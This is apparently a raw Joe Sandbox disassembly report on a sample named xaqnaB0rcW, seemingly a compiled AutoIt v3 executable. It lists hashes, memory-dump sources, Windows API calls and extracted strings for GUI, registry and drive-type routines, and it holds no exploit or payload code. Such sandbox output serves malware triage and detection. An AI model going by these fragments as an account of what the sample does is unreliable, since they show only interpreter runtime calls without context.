                                                                  • Instruction ID: 18f6a339202cfd07d118dd14bf013cb87a20f437867d5bd73a1200c257862eef
                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction Fuzzy Hash: C9C1AF322051934EDF2F863A943443EBEA15BA27B131B876DD4B6CB4DAEF24C534D620
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction ID: 808a6d987a2607a48ad7f2d63f896e365fa0ad5208cd4c9767d5fb78fd90b834
                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction Fuzzy Hash: 5AC15F322090930DDF2E4639E47443EBEA15BA2BB531B877DD4B2CB5D9EE20D574D620
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 003AA2FE
                                                                  • DeleteObject.GDI32(00000000), ref: 003AA310
                                                                  • DestroyWindow.USER32 ref: 003AA31E
                                                                  • GetDesktopWindow.USER32 ref: 003AA338
                                                                  • GetWindowRect.USER32(00000000), ref: 003AA33F
                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003AA480
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003AA490
                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA4D8
                                                                  • GetClientRect.USER32(00000000,?), ref: 003AA4E4
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003AA51E
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA540
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA553
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA55E
                                                                  • GlobalLock.KERNEL32(00000000), ref: 003AA567
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA576
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 003AA57F
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA586
                                                                  • GlobalFree.KERNEL32(00000000), ref: 003AA591
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA5A3
                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003DD9BC,00000000), ref: 003AA5B9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 003AA5C9
                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 003AA5EF
                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003AA60E
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA630
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA81D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  APIs
                                                                  • SetTextColor.GDI32(?,00000000), ref: 003BD2DB
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 003BD30C
                                                                  • GetSysColor.USER32(0000000F), ref: 003BD318
                                                                  • SetBkColor.GDI32(?,000000FF), ref: 003BD332
                                                                  • SelectObject.GDI32(?,00000000), ref: 003BD341
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 003BD36C
                                                                  • GetSysColor.USER32(00000010), ref: 003BD374
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 003BD37B
                                                                  • FrameRect.USER32(?,?,00000000), ref: 003BD38A
                                                                  • DeleteObject.GDI32(00000000), ref: 003BD391
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 003BD3DC
                                                                  • FillRect.USER32(?,?,00000000), ref: 003BD40E
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 003BD439
                                                                    • Part of subcall function 003BD575: GetSysColor.USER32(00000012), ref: 003BD5AE
                                                                    • Part of subcall function 003BD575: SetTextColor.GDI32(?,?), ref: 003BD5B2
                                                                    • Part of subcall function 003BD575: GetSysColorBrush.USER32(0000000F), ref: 003BD5C8
                                                                    • Part of subcall function 003BD575: GetSysColor.USER32(0000000F), ref: 003BD5D3
                                                                    • Part of subcall function 003BD575: GetSysColor.USER32(00000011), ref: 003BD5F0
                                                                    • Part of subcall function 003BD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003BD5FE
                                                                    • Part of subcall function 003BD575: SelectObject.GDI32(?,00000000), ref: 003BD60F
                                                                    • Part of subcall function 003BD575: SetBkColor.GDI32(?,00000000), ref: 003BD618
                                                                    • Part of subcall function 003BD575: SelectObject.GDI32(?,?), ref: 003BD625
                                                                    • Part of subcall function 003BD575: InflateRect.USER32(?,000000FF,000000FF), ref: 003BD644
                                                                    • Part of subcall function 003BD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003BD65B
                                                                    • Part of subcall function 003BD575: GetWindowLongW.USER32(00000000,000000F0), ref: 003BD670
                                                                    • Part of subcall function 003BD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003BD698
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 3521893082-0
                                                                  APIs
                                                                  • DestroyWindow.USER32 ref: 0036B98B
                                                                  • DeleteObject.GDI32(00000000), ref: 0036B9CD
                                                                  • DeleteObject.GDI32(00000000), ref: 0036B9D8
                                                                  • DestroyIcon.USER32(00000000), ref: 0036B9E3
                                                                  • DestroyWindow.USER32(00000000), ref: 0036B9EE
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 003CD2AA
                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003CD2E3
                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 003CD711
                                                                    • Part of subcall function 0036B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0036B759,?,00000000,?,?,?,?,0036B72B,00000000,?), ref: 0036BA58
                                                                  • SendMessageW.USER32 ref: 003CD758
                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003CD76F
                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 003CD785
                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 003CD790
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                  • String ID: 0
                                                                  • API String ID: 464785882-4108050209
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0039DBD6
                                                                  • GetDriveTypeW.KERNEL32(?,003EDC54,?,\\.\,003EDC00), ref: 0039DCC3
                                                                  • SetErrorMode.KERNEL32(00000000,003EDC54,?,\\.\,003EDC00), ref: 0039DE29
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 1038674560-86951937
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 003BC788
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003BC83E
                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 003BC859
                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 003BCB15
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: 0
                                                                  • API String ID: 2326795674-4108050209
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,003EDC00), ref: 003B6449
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                  • API String ID: 3964851224-45149045
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 003BD5AE
                                                                  • SetTextColor.GDI32(?,?), ref: 003BD5B2
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 003BD5C8
                                                                  • GetSysColor.USER32(0000000F), ref: 003BD5D3
                                                                  • CreateSolidBrush.GDI32(?), ref: 003BD5D8
                                                                  • GetSysColor.USER32(00000011), ref: 003BD5F0
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003BD5FE
                                                                  • SelectObject.GDI32(?,00000000), ref: 003BD60F
                                                                  • SetBkColor.GDI32(?,00000000), ref: 003BD618
                                                                  • SelectObject.GDI32(?,?), ref: 003BD625
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 003BD644
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003BD65B
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 003BD670
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003BD698
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003BD6BF
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 003BD6DD
                                                                  • DrawFocusRect.USER32(?,?), ref: 003BD6E8
                                                                  • GetSysColor.USER32(00000011), ref: 003BD6F6
                                                                  • SetTextColor.GDI32(?,00000000), ref: 003BD6FE
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003BD712
                                                                  • SelectObject.GDI32(?,003BD2A5), ref: 003BD729
                                                                  • DeleteObject.GDI32(?), ref: 003BD734
                                                                  • SelectObject.GDI32(?,?), ref: 003BD73A
                                                                  • DeleteObject.GDI32(?), ref: 003BD73F
                                                                  • SetTextColor.GDI32(?,?), ref: 003BD745
                                                                  • SetBkColor.GDI32(?,?), ref: 003BD74F
                                                                  Similarity
                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1996641542-0
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003BB7B0
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003BB7C1
                                                                  • CharNextW.USER32(0000014E), ref: 003BB7F0
                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003BB831
                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003BB847
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003BB858
                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003BB875
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 003BB8C7
                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003BB8DD
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 003BB90E
                                                                  • _memset.LIBCMT ref: 003BB933
                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003BB97C
                                                                  • _memset.LIBCMT ref: 003BB9DB
                                                                  • SendMessageW.USER32 ref: 003BBA05
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 003BBA5D
                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 003BBB0A
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 003BBB2C
                                                                  • GetMenuItemInfoW.USER32(?), ref: 003BBB76
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003BBBA3
                                                                  • DrawMenuBar.USER32(?), ref: 003BBBB2
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 003BBBDA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                  • String ID: 0
                                                                  • API String ID: 1073566785-4108050209
                                                                  • Opcode ID: 5b204780ab0e4e94c2bddcaf7d390230bcc0b1360fa31097f1215dd189745f1f
                                                                  • Instruction ID: 519f01beee1ae7c56e5ba6694a3e8b32096e05673955c8ae45b1787dcfc9dcb0
                                                                  • Opcode Fuzzy Hash: 5b204780ab0e4e94c2bddcaf7d390230bcc0b1360fa31097f1215dd189745f1f
                                                                  • Instruction Fuzzy Hash: 77E17171900218AFDB22DF65DC85EEEBB7CFF05718F108156FA19AA590DBB48A41CF60
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Foreground
                                                                  • String ID: ACTIVE$ALL$CLASS$H+@$HANDLE$INSTANCE$L+@$LAST$P+@$REGEXPCLASS$REGEXPTITLE$T+@$TITLE
                                                                  • API String ID: 62970417-1725029583
                                                                  • Opcode ID: 5d6dae92c1cdda38efe5feaa1dad465616ec026e312e9fc492a1a5d6d1d50bbf
                                                                  • Instruction ID: c3c1b93ca8ed39a3c62952f950b77c39c2f8dee436aa517c2d447beb6eb91efc
                                                                  • Opcode Fuzzy Hash: 5d6dae92c1cdda38efe5feaa1dad465616ec026e312e9fc492a1a5d6d1d50bbf
                                                                  • Instruction Fuzzy Hash: 40D1A4301086429FCB06EF10C981E9BBBB4BF54344F508A1DF856AB5A1DB74ED9ECB91
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 003B778A
                                                                  • GetDesktopWindow.USER32 ref: 003B779F
                                                                  • GetWindowRect.USER32(00000000), ref: 003B77A6
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 003B7808
                                                                  • DestroyWindow.USER32(?), ref: 003B7834
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003B785D
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003B787B
                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003B78A1
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 003B78B6
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003B78C9
                                                                  • IsWindowVisible.USER32(?), ref: 003B78E9
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003B7904
                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003B7918
                                                                  • GetWindowRect.USER32(?,?), ref: 003B7930
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 003B7956
                                                                  • GetMonitorInfoW.USER32 ref: 003B7970
                                                                  • CopyRect.USER32(?,?), ref: 003B7987
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 003B79F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: efd6a20a14ec0af94de28397cdc0489afa5ba1e882bc313db7a16e3a0e6de67d
                                                                  • Instruction ID: dda1dc8b41879771e5a64d2f2bd0357709afb3cbcfa886e0315fde4840ec6e74
                                                                  • Opcode Fuzzy Hash: efd6a20a14ec0af94de28397cdc0489afa5ba1e882bc313db7a16e3a0e6de67d
                                                                  • Instruction Fuzzy Hash: FAB1A271608300AFD715DF64D949BAABBE5FF88314F00891DF6999B2A1DB70EC05CB92
                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00396CFB
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00396D21
                                                                  • _wcscpy.LIBCMT ref: 00396D4F
                                                                  • _wcscmp.LIBCMT ref: 00396D5A
                                                                  • _wcscat.LIBCMT ref: 00396D70
                                                                  • _wcsstr.LIBCMT ref: 00396D7B
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00396D97
                                                                  • _wcscat.LIBCMT ref: 00396DE0
                                                                  • _wcscat.LIBCMT ref: 00396DE7
                                                                  • _wcsncpy.LIBCMT ref: 00396E12
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 699586101-1459072770
                                                                  • Opcode ID: a01e85b9c760cb393c4de5cefd70b5583c5780eec21eaad7e8c0a680ea57bca4
                                                                  • Instruction ID: 331d94ca7f73496ee206e7548202c0fd31d7809ee7b57c1ca98a179adfbf3486
                                                                  • Opcode Fuzzy Hash: a01e85b9c760cb393c4de5cefd70b5583c5780eec21eaad7e8c0a680ea57bca4
                                                                  • Instruction Fuzzy Hash: EC412772A01201BFEB17AB74DD43EBF777CDF41710F10406AF905AA182EB78EA0096A5
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0036A939
                                                                  • GetSystemMetrics.USER32(00000007), ref: 0036A941
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0036A96C
                                                                  • GetSystemMetrics.USER32(00000008), ref: 0036A974
                                                                  • GetSystemMetrics.USER32(00000004), ref: 0036A999
                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0036A9B6
                                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0036A9C6
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0036A9F9
                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0036AA0D
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 0036AA2B
                                                                  • GetStockObject.GDI32(00000011), ref: 0036AA47
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0036AA52
                                                                    • Part of subcall function 0036B63C: GetCursorPos.USER32(000000FF), ref: 0036B64F
                                                                    • Part of subcall function 0036B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0036B66C
                                                                    • Part of subcall function 0036B63C: GetAsyncKeyState.USER32(00000001), ref: 0036B691
                                                                    • Part of subcall function 0036B63C: GetAsyncKeyState.USER32(00000002), ref: 0036B69F
                                                                  • SetTimer.USER32(00000000,00000000,00000028,0036AB87), ref: 0036AA79
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: AutoIt v3 GUI$ICTRLCREATETREEVIEW
                                                                  • API String ID: 1458621304-2913072300
                                                                  • Opcode ID: 2f9372624be25691f8a8fd09881c6f2252b38be88a3d9119418bbf13daedc5a8
                                                                  • Instruction ID: 7d2280fc50236aa60523dc061fe6ffb5fbcf30b2ab71ecff7e5b94bcc33232e3
                                                                  • Opcode Fuzzy Hash: 2f9372624be25691f8a8fd09881c6f2252b38be88a3d9119418bbf13daedc5a8
                                                                  • Instruction Fuzzy Hash: E2B14B75A0020AAFDB16DFA8DC45BED7BB8FB08314F11812AFA15A72A4DB749840CF55
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B3735
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,003EDC00,00000000,?,00000000,?,?), ref: 003B37A3
                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003B37EB
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003B3874
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003B3B94
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 003B3BA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 536824911-966354055
                                                                  • Opcode ID: 17259cf6dd74f6d0ac96df6a4a7d796184e852415bbdce7559cd20b4e0d35a1e
                                                                  • Instruction ID: c58ffd478d97c0ef38cce49af460565408ee44d04cd0d0fe0f533678f39a9380
                                                                  • Opcode Fuzzy Hash: 17259cf6dd74f6d0ac96df6a4a7d796184e852415bbdce7559cd20b4e0d35a1e
                                                                  • Instruction Fuzzy Hash: D4026775204611DFCB16EF24C891E6AB7E9FF88724F05845DF98A9B2A1CB30ED05CB85
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 003B6C56
                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003B6D16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                  • API String ID: 3974292440-719923060
